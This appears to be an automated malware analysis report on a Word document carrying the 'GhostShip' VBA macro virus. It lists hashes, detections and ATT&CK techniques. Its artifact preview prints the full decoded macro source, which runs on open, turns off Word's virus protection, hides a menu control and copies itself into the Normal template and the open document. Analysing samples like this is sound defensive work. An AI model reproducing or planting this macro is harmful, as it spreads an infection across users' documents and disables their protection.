GhostShip Office (OLE) malware analysis — malicious · cac7537613787550

MALICIOUS

Office (OLE)

31.0 KB Created: 1998-08-24 20:27:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 4c97e88e40ea44c2cd56994c4ee9fa0b SHA-1: 1c1cb3b0ccee7ae2aa4af50fb0c54e15143484fc SHA-256: cac7537613787550af5af819a57fbe19a54f53c06e397e693f3ebe96e58f8b9e

180 Risk Score

Malware Insights

GhostShip · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing a malicious VBA macro. The macro is triggered by the Document_Open event, indicating it executes automatically when the document is opened. The script attempts to copy itself to Normal.bas and Document.bas, suggesting a persistence or infection mechanism. The family is identified as 'GhostShip' based on strings within the VBA code.

Heuristics 3

ClamAV: Doc.Trojan.Carrier-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Carrier-3
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2023 bytes
SHA-256: `2cfee8cff4ba7882cd910fa1232396ff420ba61a3e64eeef838ccdffaa8a30e3`
Detection ClamAV: Doc.Trojan.Carrier-3 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() VirName = GhostShip Engine = DarkLord + LordArz NormInstalled = False ActInstalled = False Options.VirusProtection = False Application.CommandBars("Tools").Controls(12).Controls(3).Visible = False 'Infection way based on the old GhostShip Version 'New infection engine: TDIE by Dark Lord and Lord Arz NormalTemplate.VBProject.VBComponents(1).export ("c:\Normal.bas") ActiveDocument.VBProject.VBComponents(1).export ("c:\Document.bas") NI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, 1) AI = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, 1) If UCase(NI) = "VIRNAME = GHOSTSHIP" Then NormInstalled = True If UCase(AI) = "VIRNAME = GHOSTSHIP" Then ActInstalled = True If NormInstalled = True And ActIntalled = True Then GoTo PayLoad If NormInstalled = True Then IW = "c:\Normal.bas" Else IW = "C:\Document.bas" Open IW For Input As #1 VirCode = "Private Sub Document_Open()" & Chr(13) Do Line Input #1, SRCLine Loop Until SRCLine = "Private Sub Document_Open()" Do Until SRCLine = "End Sub" Line Input #1, SRCLine VirCode = VirCode & SRCLine & Chr(13) Loop If NormInstalled = False Then Lines = NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines NormalTemplate.VBProject.VBComponents(1).CodeModule.deletelines 1, Lines NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, VirCode End If If ActInstalled = False Then Lines = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines ActiveDocument.VBProject.VBComponents(1).CodeModule.deletelines 1, Lines ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, VirCode End If Close Kill ("C:\Normal.bas") Kill ("C:\Document.bas") PayLoad: WrittenBy = LordArz End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.